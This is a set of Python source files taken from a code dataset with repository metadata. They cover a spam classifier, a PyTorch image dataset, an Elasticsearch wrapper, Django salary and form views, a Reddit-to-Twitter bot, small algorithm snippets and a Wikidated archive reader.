2))),\n ('tfidf_transformer', TfidfTransformer()),\n ('classifier', MultinomialNB())\n ])\n # fit data\n pipeline.fit(data['content'].values, data['class'].values)\n\n # dump classifier\n joblib.dump(pipeline, 'trained_data.pkl', compress=9)\n\n return pipeline\n\n\ndef classify(model, emails):\n \"\"\"Classify given email body\"\"\"\n return model.predict(emails)\n\n\ndef read_argv():\n \"\"\"Read emails from argv, and yield file name and email body\"\"\"\n for arg in sys.argv[1:]:\n try:\n with open(arg, 'rb') as f:\n msg = email.message_from_binary_file(f, policy=email.policy.default)\n try:\n msg_body = msg.get_body(preferencelist=('html', 'plain'))\n msg_body_payload = msg_body.get_payload(decode=True)\n charset = msg_body.get_content_charset(DEFAULT_CHARSET)\n except:\n msg_body_payload = msg.get_payload(decode=True)\n charset = msg.get_content_charset(DEFAULT_CHARSET)\n # try to decode payload\n try:\n msg_payload_decoded = msg_body_payload.decode(charset)\n except:\n charset = DEFAULT_CHARSET\n msg_payload_decoded = msg_body_payload.decode(charset)\n\n lines = [html2text.html2text(line).strip() for line in msg_payload_decoded.splitlines() if html2text.html2text(line).strip()]\n except:\n print(arg, '- FAIL')\n continue\n\n yield arg, \"\".join(lines)\n\nif __name__ == '__main__':\n train_model()\n # load classifier\n model = joblib.load('trained_data.pkl')\n for file, content in read_argv():\n prediction = classify(model, [content])\n if prediction[0] == 1.0:\n print(file, '- SPAM')\n elif prediction[0] == 0.0:\n print(file, '- 
OK')\n","repo_name":"psegedy/antispam","sub_path":"antispam.py","file_name":"antispam.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3345115696","text":"from pathlib import Path\nfrom torch.utils.data import Dataset, DataLoader, sampler\nfrom PIL import Image\nimport torch\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom torch import nn\n\n\nclass CloudDataset(Dataset):\n def __init__(self, r_dir, g_dir, b_dir, nir_dir, gt_dir, pytorch=True):\n super().__init__()\n # For each image in the red folder, we get its path \"f\", and create a list of dictionaries containing each path for each channel\n self.files = [\n self.combine_files(f, g_dir, b_dir, nir_dir, gt_dir)\n for f in r_dir.iterdir()\n if not f.is_dir()\n ]\n self.pytorch = pytorch\n\n # given a red image file path it returns a dictionary with the image path of each channel\n def combine_files(self, r_file: Path, g_dir, b_dir, nir_dir, gt_dir):\n\n files = {\n \"red\": r_file,\n \"green\": g_dir / r_file.name.replace(\"red\", \"green\"),\n \"blue\": b_dir / r_file.name.replace(\"red\", \"blue\"),\n \"nir\": nir_dir / r_file.name.replace(\"red\", \"nir\"),\n \"gt\": gt_dir / r_file.name.replace(\"red\", \"gt\"),\n }\n\n return files\n\n def __len__(self):\n return len(self.files)\n\n def open_as_array(self, idx, invert=False, include_nir=False):\n\n raw_rgb = np.stack(\n [\n np.array(Image.open(self.files[idx][\"red\"])),\n np.array(Image.open(self.files[idx][\"green\"])),\n np.array(Image.open(self.files[idx][\"blue\"])),\n ],\n axis=2,\n )\n\n if include_nir:\n nir = np.expand_dims(np.array(Image.open(self.files[idx][\"nir\"])), 2)\n raw_rgb = np.concatenate([raw_rgb, nir], axis=2)\n\n if invert:\n raw_rgb = raw_rgb.transpose((2, 0, 1))\n\n # normalize\n return raw_rgb / np.iinfo(raw_rgb.dtype).max\n\n def open_mask(self, idx, add_dims=False):\n\n raw_mask = np.array(Image.open(self.files[idx][\"gt\"]))\n raw_mask = np.where(raw_mask == 255, 1, 0)\n\n return np.expand_dims(raw_mask, 0) if add_dims else raw_mask\n\n def __getitem__(self, idx):\n\n x = torch.tensor(\n self.open_as_array(idx, invert=self.pytorch, include_nir=True),\n dtype=torch.float32,\n )\n y = torch.tensor(self.open_mask(idx, add_dims=False), dtype=torch.int64)\n\n return x, y\n\n def open_as_pil(self, idx):\n\n arr = 256 * self.open_as_array(idx)\n\n return Image.fromarray(arr.astype(np.uint8), \"RGB\")\n\n def __repr__(self):\n s = \"Dataset class with {} files\".format(self.__len__())\n\n return s\n","repo_name":"LeBrav/CloudSegmentation","sub_path":"workspace/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32578583089","text":"import sys\nimport time\nimport collections\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import (\n scan,\n bulk,\n parallel_bulk,\n streaming_bulk,\n)\nfrom .base import BaseDatabase\nfrom ..helpers import expand_envvars\nfrom typing import (\n Any,\n List,\n Dict,\n Tuple,\n Union,\n Iterable,\n Iterator,\n)\n\n\n__all__ = ['ElasticsearchDatabase']\n\n\nclass Elasticsearchx(Elasticsearch):\n \"\"\"Elasticsearch database interface extended with helper methods.\"\"\"\n\n def bulkx(\n self,\n actions: Iterable[Dict[str, Any]],\n *,\n stream: bool = False,\n thread_count: int = 1,\n **kwargs\n ) -> Tuple[int, List[Any]]:\n \"\"\"Extended bulk 
API.\n\n Args:\n actions (Iterable[Dict[str, Any]]): Actions for 'Helpers.*bulk()'.\n https://elasticsearch-py.readthedocs.io/en/master/helpers.html#elasticsearch.helpers.bulk\n\n stream (bool): If set, use streaming bulk instead of bulk API.\n\n thread_count (int): Number of threads for parallel bulk API.\n If single threaded, use bulk API.\n\n Kwargs: Options forwarded to 'elasticsearch.helpers.*bulk()' functions.\n\n Notes:\n * 'streaming_bulk()' and 'parallel_bulk()' return generators\n which need to be consumed for operation to complete.\n \"\"\"\n if stream:\n response = streaming_bulk(self, actions, **kwargs)\n elif thread_count == 1:\n response = bulk(self, actions, **kwargs)\n else:\n response = parallel_bulk(\n self,\n actions,\n thread_count=thread_count,\n **kwargs\n )\n return response\n\n def bulk_index(\n self,\n documents: Iterable[Dict[str, Any]],\n *,\n index: str,\n op_type: str = 'index',\n ids: Iterable[str] = None,\n **kwargs\n ) -> Tuple[int, List[Any]]:\n \"\"\"Bulk index and create documents.\n\n Args:\n documents (Iterable[Dict[str, Any]]): List of document\n fields/values to index.\n\n index (str): Index name to search.\n\n op_type (str): Explicit operation type. Valid values are 'index'\n and 'create'.\n\n ids (Iterable[str]): Document ID. If set to None, ES sets\n random ones.\n\n Kwargs: Options forwarded to 'bulkx()'.\n \"\"\"\n if ids is None:\n actions = (\n {'_op_type': op_type, '_index': index, '_source': document}\n for document in documents\n )\n else:\n actions = (\n {\n '_op_type': op_type,\n '_index': index,\n '_source': document,\n '_id': id,\n } for id, document in zip(ids, documents)\n )\n return self.bulkx(actions, **kwargs)\n\n def scan(\n self,\n body: Dict[str, Any],\n *,\n index: Union[str, List[str]],\n **kwargs\n ) -> Iterator[Dict[str, Any]]:\n \"\"\"Scan/scroll through documents.\n\n Args:\n body (Dict[str, Any]): Body for 'Helpers.scan()'.\n https://elasticsearch-py.readthedocs.io/en/master/helpers.html#scan\n\n index (Union[str, List[str]]): Index names to search.\n https://elasticsearch-py.readthedocs.io/en/master/api.html#elasticsearch.Elasticsearch.search\n\n Kwargs: Options forwarded to 'elasticsearch.helpers.scan()'.\n \"\"\"\n return scan(self, body, index=index, **kwargs)\n\n\nclass ElasticsearchDatabase(BaseDatabase):\n \"\"\"Elasticsearch database interface.\n\n Elasticsearch database interface with limited key/value related\n methods.\n\n Args:\n hosts (Any): Elasticsearch host(s).\n\n index (str): Index name.\n\n index_body (Dict[str, Any]): Mapping and settings for index.\n If None, the index uses dynamic mapping, see\n https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html#_dynamic_mapping\n\n access_mode (str): Access mode for database.\n Valid values are: 'r' = read-only, 'w' = read/write,\n 'c' = read/write/create if not exists, 'n' = new read/write.\n\n use_pipeline (bool): If set, queue 'set-related' commands to database.\n Run 'commit()' command to submit commands in pipe.\n\n connect (bool): If set, automatically connect during initialization.\n\n stream (bool): If set, use streaming bulk instead of bulk API.\n\n thread_count (int): Number of threads for parallel bulk API.\n If single threaded, use bulk API.\n\n max_connect_attempts (int): Number of times to attempt connecting to\n database during object instantiation. 
There is no connection\n handling if connection disconnects at any other moment.\n\n Kwargs: Options forwarded to 'Elasticsearch()' via 'Elasticsearchx()'.\n \"\"\"\n\n NAME = 'elasticsearch'\n\n def __init__(\n self,\n index: str = 'test',\n *,\n index_body: Dict[str, Any] = None,\n hosts: Any = 'localhost:9200',\n access_mode: str = 'c',\n use_pipeline: bool = False,\n connect: bool = True,\n stream: bool = False,\n thread_count: int = 1,\n max_connect_attempts: int = 1,\n **conn_info,\n ):\n self._conn = None\n self._pipeline = None\n self._hosts = hosts\n self._index = index\n self._index_body = index_body\n self._access_mode = access_mode\n self._use_pipeline = use_pipeline\n self._stream = stream\n self._thread_count = thread_count\n self._max_connect_attempts = max_connect_attempts\n self._conn_info = conn_info\n\n if connect:\n self.connect()\n else:\n self._pre_connect()\n\n def _pre_connect(self, **kwargs):\n self._hosts = kwargs.pop('hosts', self._hosts)\n self._index = expand_envvars(kwargs.pop('index', self._index))\n self._index_body = kwargs.pop('index_body', self._index_body)\n self._access_mode = kwargs.pop('access_mode', self._access_mode)\n self._use_pipeline = kwargs.pop('use_pipeline', self._use_pipeline)\n self._stream = kwargs.pop('stream', self._stream)\n self._thread_count = kwargs.pop('thread_count', self._thread_count)\n self._max_connect_attempts = kwargs.pop(\n 'max_connect_attempts',\n self._max_connect_attempts,\n )\n self._conn_info.update(kwargs)\n\n def _post_connect(self):\n if self._access_mode in ('c', 'n'):\n if self._access_mode == 'n':\n self.clear()\n\n if not self._conn.indices.exists(index=self._index):\n self._conn.indices.create(\n index=self._index,\n body=self._index_body,\n )\n\n if self._use_pipeline:\n self._pipeline = {}\n\n def __len__(self):\n return self._conn.count(index=self._index)['count']\n\n def __contains__(self, id):\n return NotImplemented\n\n def __getitem__(self, id):\n return NotImplemented\n\n def __setitem__(self, id, body):\n self.set(body, id=id)\n\n def __delitem__(self, id):\n self._conn.delete(index=self._index, id=id)\n\n def __iter__(self):\n return self.ids()\n\n @property\n def backend(self):\n return self._conn\n\n def configuration(self):\n is_connected = self.ping()\n return {\n 'connected': is_connected,\n 'hosts': self._hosts,\n 'index': self._index,\n 'access mode': self._access_mode,\n 'pipelined': self._use_pipeline,\n 'stream': self._stream,\n 'thread count': self._thread_count,\n 'max connect attempts': self._max_connect_attempts,\n 'nrows': len(self) if is_connected else -1,\n 'store': (\n self._conn.indices.stats(\n index=self._index,\n )['_all']['primaries']['store']['size_in_bytes']\n if is_connected\n else -1\n ),\n 'mapping': (\n self._conn.indices.get_mapping(index=self._index)\n if is_connected\n else {}\n ),\n 'settings': (\n self._conn.indices.get_settings(index=self._index)\n if is_connected\n else {}\n ),\n }\n\n def info(self, **kwargs):\n return self._conn.info(**kwargs)\n\n def index_stats(self, **kwargs):\n return self._conn.indices.stats(index=self._index, **kwargs)\n\n def get(self, query: Dict[str, Any], *, key=None, **kwargs):\n \"\"\"\n Args:\n key (Any): A hashable value that is unique for the document,\n that is used as a key for storing in pipeline dictionary.\n \"\"\"\n if self._use_pipeline and key is not None and key in self._pipeline:\n return self._pipeline[key]\n return self._conn.search(index=self._index, body=query, **kwargs)\n\n def set(self, document: Dict[str, Any], *, 
key=None, **kwargs):\n \"\"\"\n Args:\n key (Any): A hashable value that is unique for the document,\n that is used as a key for storing in pipeline dictionary.\n \"\"\"\n if self._use_pipeline and key is not None:\n self._pipeline[key] = document\n else:\n self._conn.index(index=self._index, body=document, **kwargs)\n\n def scan(self, **kwargs):\n return self._conn.scan({}, index=self._index, **kwargs)\n\n def ids(self, **kwargs):\n return map(\n lambda x: x['_id'],\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def items(self, **kwargs):\n return map(\n lambda x: (x['_id'], x['_source']),\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def documents(self, **kwargs):\n return map(\n lambda x: x['_source'],\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def delete(self, id, **kwargs):\n self._conn.delete(index=self._index, id=id, **kwargs)\n\n def connect(self, **kwargs):\n if self.ping():\n return\n\n self._pre_connect(**kwargs)\n\n for connect_attempt in range(1, self._max_connect_attempts + 1):\n self._conn = Elasticsearchx(self._hosts, **self._conn_info)\n if self._conn.ping():\n break\n print('Warning: failed connecting to Elasticsearch at '\n f'{self._hosts}, reconnection attempt '\n f'{connect_attempt} ...',\n file=sys.stderr)\n time.sleep(1)\n else:\n raise ConnectionError(\n 'failed to connect to Elasticsearch hosts'\n )\n\n self._post_connect()\n\n def commit(self, **kwargs):\n if not self.ping():\n return\n if self._use_pipeline and self._pipeline:\n # NOTE: deque consumes streaming/parallel bulk generators\n # and discards its results.\n collections.deque(\n self._conn.bulk_index(\n self._pipeline.values(),\n index=self._index,\n stream=self._stream,\n thread_count=self._thread_count,\n **kwargs,\n ),\n maxlen=0,\n )\n self._pipeline = {}\n # NOTE: Elasticsearch automatically triggers flushes as needed.\n # These flushes move data from the transaction log into the Lucene index.\n # self._conn.indices.flush(index=self._index)\n\n def disconnect(self):\n if self.ping():\n self._conn.close()\n self._pipeline = None\n\n def clear(self, **kwargs):\n # NOTE: Elasticsearch does not support deleting index content,\n # so we delete the index and recreate it.\n self.drop_index(**kwargs)\n self._conn.indices.create(index=self._index, body=self._index_body)\n if self._use_pipeline:\n self._pipeline = {}\n\n def drop_index(self, **kwargs):\n if self._conn.indices.exists(index=self._index):\n self._conn.indices.delete(index=self._index, **kwargs)\n\n def ping(self):\n return self._conn is not None and self._conn.ping()\n","repo_name":"edponce/FACET","sub_path":"facet/database/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32213829785","text":"def instructorProfile(id, name, **kwargs):\n print(f\"[{id}]instructor:{name} with expertise\")\n for k, v in kwargs.items():\n print(f\"in {k} field, familiar with {v}\")\n\n\ninstructorProfile(1, \"Mark\")\ninstructorProfile(2, \"Mark\", python=\"Tensorflow\", java=\"Spring\")\ninstructorProfile(3, \"Ken\", mobile=\"iOS\", server=\".NET\", os=\"Linux\")\nskill = {\"js\": \"Async Programming\", \"frontend\": \"React\", \"cryptoCurrency\": \"Ethereum\"}\ninstructorProfile(4,\"Hawk\", 
**skill)","repo_name":"babyhello/pythonlearn","sub_path":"lab29.py","file_name":"lab29.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31646339317","text":"n = int(input())\na = list(map(int, input().split(' ')))\nnum = 0\nfor i in range(len(a)):\n if a[i] % 2 == 1:\n a[i] -= 1\n if num == 0:\n num += 1\n\ndef isEnd(a):\n flag = a[0]\n for i in range(1, len(a)):\n if a[i] != flag:\n return False\n return True\n\ndef pro_max(a, num1):\n num = 0\n for i in range(len(a)):\n if a[i] == num1:\n a[i] = a[i] // 2\n num += 1\n return num\n\ndef pro_min(a, num1):\n num = 0\n for i in range(len(a)):\n if a[i] == num1:\n a[i] *= 2\n num += 1\n return num\n\n\nwhile (not isEnd(a)):\n _min = min(a)\n _max = max(a)\n _min_count = a.count(_min)\n _max_count = a.count(_max)\n if _min_count < _max_count:\n num += pro_min(a, _min)\n else:\n num += pro_max(a, _max)\n #print (a)\nprint (num)\n ","repo_name":"muyurainy/interview","sub_path":"bishi_code/zhaoshang/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21919452793","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib import messages #import messages\nfrom django.views.generic import TemplateView\n\n\n\n\ndef SalaryCalculator(request):\n return render(request, 'index3.html')\n\n# Create your views here.\n\ndef SalaryDetails(request):\n\n ctc = float(request.GET.get('inputctc'))\n bonus = float(request.GET.get('bonus'))\n bonustype = request.GET.get('bonustype')\n total_bonus = 0\n if bonustype == 'percent':\n total_bonus = (bonus*ctc)*0.01\n elif bonustype == 'amt':\n total_bonus = bonus\n else:\n total_bonus = 0\n\n total_salary = ctc-total_bonus\n\n\n\n basic_salary = .5*total_salary\n #da = float(request.GET.get('dall'))\n\n epf = float(request.GET.get('epf'))\n experience = float(request.GET.get('exp'))\n annual_epf = 12*epf\n gratuity = ((basic_salary)/12)*(0.58)*experience\n location = request.GET.get('loc')\n prof_tax = 12*float(request.GET.get('pftax'))\n pf = float(request.GET.get('epf'))\n insurance = 12*float(request.GET.get('einsurance'))\n additional1 = float(request.GET.get('Add1'))\n additional2 = float(request.GET.get('Add2'))\n additional3 = float(request.GET.get('Add3'))\n additional1dur = request.GET.get('add1dur')\n additional2dur = request.GET.get('add2dur')\n additional3dur = request.GET.get('add3dur')\n if additional1dur=='monthly':\n additional1 = additional1*12\n if additional2dur=='monthly':\n additional2 = additional2*12\n if additional3dur=='monthly':\n additional3 = additional3*12\n hra = 0\n if location=='metro':\n hra = 0.5*basic_salary\n else:\n hra = 0.4*basic_salary\n\n\n\n total_deductions = prof_tax+(2*annual_epf)+insurance+additional1+additional2+additional3\n gross_salary = ctc - annual_epf - gratuity\n taxable_income = total_salary-total_deductions\n\n it = 0\n cess = 0.04*taxable_income\n if taxable_income > 250000 and taxable_income<= 500000:\n it = 0.05*taxable_income\n elif taxable_income>500000 and taxable_income<=1000000:\n it = 12500+ 0.2*(taxable_income-500000)\n else:\n\n it = 112500 + 0.3*(taxable_income-1000000)\n\n inhandsal = taxable_income-it\n ihspm = round((inhandsal/12),2)\n takehome_salary = round((inhandsal)/12)\n\n additional = round(additional2+additional3+additional1)\n\n params = 
{'CTC':ctc,'Gross':gross_salary,'taxable':taxable_income,'tbonus':total_bonus,\n 'bs':basic_salary,'ins':insurance,\n 'hra':hra,'ad':additional,'ad1':additional1,'ad2':additional2,'ad3':additional3,'it':it,'ihs':inhandsal,'ihspm':ihspm,\n 'epf':annual_epf,'gt':gratuity,'prof':prof_tax,'res':takehome_salary, 'ts':total_salary , 'td':total_deductions\n }\n\n return render(request,'salarydetails.html',params)\n","repo_name":"priotosh-m7/Finance-Aid","sub_path":"mock/SalaryCalculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"59928922","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.forms import formset_factory\nfrom django.contrib import messages\n\nfrom formtools.wizard.views import SessionWizardView\n\nfrom .models import Client\nfrom .forms import ContactFormStepOne, ContactFormStepTwo, ContactFormStepTree,\\\n Formset, FormMessages, WidgetForm\n\n\nclass ContactWizard(SessionWizardView):\n form_list = [ContactFormStepOne, ContactFormStepTwo, ContactFormStepTree]\n\n def done(self, form_list, form_dict, **kwargs):\n all_cleaned_data = self.get_all_cleaned_data()\n instance = Client(\n first_name = all_cleaned_data['first_name'],\n last_name = all_cleaned_data['last_name'],\n eng = all_cleaned_data['eng'],\n phone = all_cleaned_data['phone'],\n email = all_cleaned_data['email']\n )\n instance.save()\n\n if form_list:\n return render(self.request, 'formtools/wizard/done.html', {\n 'form_data': [form.cleaned_data for form in form_list]\n })\n\n \ndef formset_view(request): \n context ={} \n \n # creating a formset \n FormSet = formset_factory(Formset, extra=3, max_num=3) \n formset = FormSet()\n \n # Add the formset to context dictionary \n context['formset']= formset \n return render(request, \"formset.html\", context)\n\ndef form_messages(request):\n # obj = Client.objects.get(id=60)\n\n if request.is_ajax():\n form = FormMessages(request.GET)\n captcha_error = True if 'captcha' in form.errors else False\n response = {\n \"captcha_error\": captcha_error,\n }\n return JsonResponse(response)\n\n if request.method == 'POST':\n form = FormMessages(request.POST, request.FILES)\n aa = form.errors['captcha']\n aa.clear()\n if 'captcha' in form.errors:\n del form.errors['captcha']\n if form.is_valid():\n form.save()\n messages.success(request, 'Form submission successful')\n else:\n # form = FormMessages(instance=obj)\n form = FormMessages()\n return render(request, 'form_message.html', {'form': form})\n\n\ndef widget_form(request):\n if request.method == 'POST':\n form = WidgetForm(request.POST)\n if form.is_valid():\n return render(request, 'success.html')\n else:\n form = WidgetForm()\n return render(request, 'widget_form.html', {'form': form})","repo_name":"Nikolay89Veselinov/Python-Django","sub_path":"contrib/form_wizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27114620201","text":"import praw\r\nimport tweepy\r\nfrom bitlyshortener import Shortener\r\nimport time\r\n\r\n# BITLY RELATED TOKENS\r\n\r\nBITLY_ACCESS_TOKEN = ['X']\r\n\r\n\r\n# TWITTER RELATED AUTHORISATION LINKS\r\n\r\n\r\n# STARTS AN INSTANCE OF REDDIT\r\ndef reddit_instance():\r\n print('working')\r\n reddit = praw.Reddit(\r\n user_agent='reddit Twitter tool monitoring ',\r\n 
client_id='dEEbK2AqmzqQGg',\r\n client_secret='q3t_RQSIavCya_e78hKtEgRXw-k')\r\n subreddit = reddit.subreddit('Automate') # Write the sub that you want of course\r\n return subreddit\r\n\r\n\r\ndef tweet_creator(subreddit):\r\n post_dict = {}\r\n post_ids = []\r\n\r\n print(\"[bot] Getting posts from Reddit\")\r\n # subreddit. hot, new, top\r\n # Fetch each post and check whether it has been posted; if it hasn't, add it to the current batch to post\r\n for submission in subreddit.hot(limit=5):\r\n # the shorten_title function is defined later\r\n post_id = submission.id\r\n posted = post_checker(post_id)\r\n if posted > 0:\r\n post_dict[shorten_title(submission.title)] = submission.url\r\n post_ids.append(submission.id)\r\n\r\n\r\n print(\"[bot] Generating short link using Bitly\")\r\n # This generates the links for the posts and stores them\r\n mini_post_dict = {}\r\n\r\n for post in post_dict:\r\n post_title = post\r\n post_link = [post_dict[post]]\r\n # the shortener function is defined later\r\n short_link = shorten_url(post_link)\r\n mini_post_dict[post_title] = short_link\r\n\r\n return mini_post_dict, post_ids\r\n\r\n\r\n# Used Bitly to shorten reddit.com links\r\ndef shorten_url(url):\r\n shortener = Shortener(tokens=BITLY_ACCESS_TOKEN, max_cache_size=8192)\r\n\r\n if any('reddit' in s for s in url):\r\n link = shortener.shorten_urls(url)\r\n else:\r\n link = url\r\n return link\r\n\r\n# Limits the title length of tweet\r\ndef shorten_title(title):\r\n # Shortens a tweet so that it does not get rejected by twitter on char limit\r\n if len(title) < 94:\r\n return title\r\n else:\r\n return title[:93] + \"...\"\r\n\r\n\r\ndef add_id_to_file(post_id):\r\n # Append the post id to the txt file so the same post is never tweeted twice\r\n # (I think tweepy actually errors out if you try to anyhow)\r\n with open('posted_posts.txt', 'a') as file:\r\n file.write(str(post_id) + \"\\n\")\r\n\r\n\r\ndef duplicate_checker(post_id):\r\n found = 0\r\n with open('posted_posts.txt', 'r') as file:\r\n for line in file:\r\n if post_id in line:\r\n found = 1\r\n\r\n return found\r\n\r\n\r\ndef post_checker(post_id):\r\n # Checks for duplicate posts\r\n found = duplicate_checker(post_id)\r\n posted = 0\r\n if found < 1:\r\n add_id_to_file(post_id)\r\n posted = 1\r\n return posted\r\n\r\n\r\ndef tweeter(post_dict, post_ids):\r\n\r\n # Access token taken from twitter Dev account\r\n\r\n ACCESS_TOKEN = 'X'\r\n ACCESS_TOKEN_SECRET = 'X'\r\n CONSUMER_KEY = 'X'\r\n CONSUMER_SECRET = 'X'\r\n\r\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\r\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\r\n api = tweepy.API(auth)\r\n\r\n # This loop posts to twitter\r\n for post, post_id in zip(post_dict, post_ids):\r\n\r\n i = str(*post_dict[post])\r\n new_tweet = (post + ' ' + i + '#automation' + ' ' + '#automate' + ' ' + '#robotics' + ' ' + '#AI')\r\n print(new_tweet)\r\n # Delay to prevent twitter from banning account\r\n time.sleep(1200)\r\n api.update_status(status=new_tweet)\r\n\r\n\r\ndef main():\r\n subreddit = reddit_instance()\r\n post_dict, post_ids = tweet_creator(subreddit)\r\n tweeter(post_dict, post_ids)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n print('finished')\r\n","repo_name":"engiTiarnan/Twittwer-Automate-Bot","sub_path":"arbot.py","file_name":"arbot.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25871557611","text":"import sys\ndef input():\n return 
sys.stdin.readline().rstrip()\n\nM = int(input())\n\nleft = 0\nright = 500000001\n\nflag = False\nwhile left+1 < right:\nimport torch\nimport torch.utils.data as Data\n\nsentences = [\n ['ich mochte ein bier P', 'S i want a beer .', 'i want a beer . E'],\n ['ich mochte ein cola P', 'S i want a coke .', 'i want a coke . E']\n]\n\n# Padding Should be Zero\nsrc_word_index = {'P': 0, 'ich': 1,\n 'mochte': 2, 'ein': 3, 'bier': 4, 'cola': 5}\nsrc_vocab_size = len(src_word_index)\n\ntgt_word_index = {'P': 0, 'i': 1, 'want': 2, 'a': 3,\n 'beer': 4, 'coke': 5, 'S': 6, 'E': 7, '.': 8}\nsrc_index_word = {i: w for i, w in enumerate(src_word_index)}\ntgt_index_word = {i: w for i, w in enumerate(tgt_word_index)}\ntgt_vocab_size = len(tgt_word_index)\n\nsrc_len = 5 # enc_input max sequence length\ntgt_len = 6 # dec_input(=dec_output) max sequence length\n\n\ndef make_data(sentences):\n enc_inputs, dec_inputs, dec_outputs = [], [], []\n for i in range(len(sentences)):\n enc_input_, dec_input_, dec_output_ = sentences[i]\n # [[1, 2, 3, 4, 0], [1, 2, 3, 5, 0]]\n enc_input = [src_word_index[n] for n in enc_input_.split()]\n # [[6, 1, 2, 3, 4, 8], [6, 1, 2, 3, 5, 8]]\n dec_input = [tgt_word_index[n] for n in dec_input_.split()]\n # [[1, 2, 3, 4, 8, 7], [1, 2, 3, 5, 8, 7]]\n dec_output = [tgt_word_index[n] for n in dec_output_.split()]\n\n enc_inputs.append(enc_input)\n dec_inputs.append(dec_input)\n dec_outputs.append(dec_output)\n\n return torch.LongTensor(enc_inputs), torch.LongTensor(dec_inputs), torch.LongTensor(dec_outputs)\n\n\nclass MyDataSet(Data.Dataset):\n def __init__(self):\n super(MyDataSet, self).__init__()\n enc_inputs, dec_inputs, dec_outputs = make_data(sentences)\n self.enc_inputs = enc_inputs\n self.dec_inputs = dec_inputs\n self.dec_outputs = dec_outputs\n\n def __len__(self):\n return self.enc_inputs.shape[0]\n\n def __getitem__(self, idx):\n return self.enc_inputs[idx], self.dec_inputs[idx], self.dec_outputs[idx]\n\n\ndata_loader = Data.DataLoader(MyDataSet(), batch_size=2, shuffle=True)\n","repo_name":"machingclee/2022-07-04-transformer-from-scratch","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35492103265","text":"from __future__ import annotations\n\nimport re\nfrom datetime import datetime, timezone\nfrom logging import getLogger\nfrom pathlib import Path\nfrom sys import maxsize\nfrom typing import (\n Any,\n Generic,\n Iterable,\n Iterator,\n Optional,\n Tuple,\n TypeVar,\n Union,\n overload,\n)\n\nfrom tqdm import tqdm # type: ignore\nfrom typing_extensions import Final\n\nfrom wikidated._utils import RangeMap, SevenZipArchive\nfrom wikidated.wikidated_entity_streams import (\n WikidatedEntityStreams,\n WikidatedEntityStreamsFile,\n)\nfrom wikidated.wikidated_revision import WikidatedRevision\n\n_LOGGER = getLogger(__name__)\n\n\nclass WikidatedSortedEntityStreamsFile:\n def __init__(self, archive_path: Path, page_ids: range) -> None:\n self.archive_path: Final = archive_path\n self.page_ids: Final = page_ids\n\n def iter_revisions(\n self,\n *,\n min_revision_id: Optional[int] = None,\n max_revision_id: Optional[int] = None,\n min_timestamp: Optional[datetime] = None,\n max_timestamp: Optional[datetime] = None,\n ) -> Iterator[WikidatedRevision]:\n if not self.archive_path.exists():\n raise FileNotFoundError(self.archive_path)\n archive = SevenZipArchive(self.archive_path)\n min_revision_id_ = min_revision_id or -maxsize\n max_revision_id_ = max_revision_id or maxsize\n min_timestamp_ = min_timestamp or datetime.min\n max_timestamp_ = max_timestamp or datetime.max\n if not min_timestamp_.tzinfo:\n min_timestamp_ = min_timestamp_.replace(tzinfo=timezone.utc)\n if not max_timestamp_.tzinfo:\n max_timestamp_ = max_timestamp_.replace(tzinfo=timezone.utc)\n with archive.read() as fd:\n for line in fd:\n revision = WikidatedRevision.parse_raw(line)\n if (\n revision.revision_id < min_revision_id_\n or revision.timestamp < 
min_timestamp_\n ):\n continue\n if (\n revision.revision_id > max_revision_id_\n or revision.timestamp > max_timestamp_\n ):\n break\n yield revision\n\n @classmethod\n def archive_path_glob(cls, dataset_dir: Path) -> str:\n return f\"{dataset_dir.name}-sorted-entity-streams-p*-p*.7z\"\n\n @classmethod\n def _make_archive_path(cls, dataset_dir: Path, page_ids: range) -> Path:\n return dataset_dir / (\n f\"{dataset_dir.name}-sorted-entity-streams\"\n f\"-p{page_ids.start}-p{page_ids.stop - 1}.7z\"\n )\n\n @classmethod\n def _parse_archive_path(cls, path: Path) -> Tuple[Path, range]:\n match = re.match(\n r\"^(?P.+)-sorted-entity-streams\"\n r\"-p(?P\\d+)-p(?P\\d+).7z$\",\n path.name,\n )\n assert match\n\n dataset_dir = path.parent.resolve()\n assert dataset_dir.name == match[\"dataset_dir_name\"]\n page_ids = range(int(match[\"min_page_id\"]), int(match[\"max_page_id\"]) + 1)\n return dataset_dir, page_ids\n\n @classmethod\n def load_custom(cls, path: Path) -> WikidatedSortedEntityStreamsFile:\n _, page_ids = cls._parse_archive_path(path)\n return WikidatedSortedEntityStreamsFile(path, 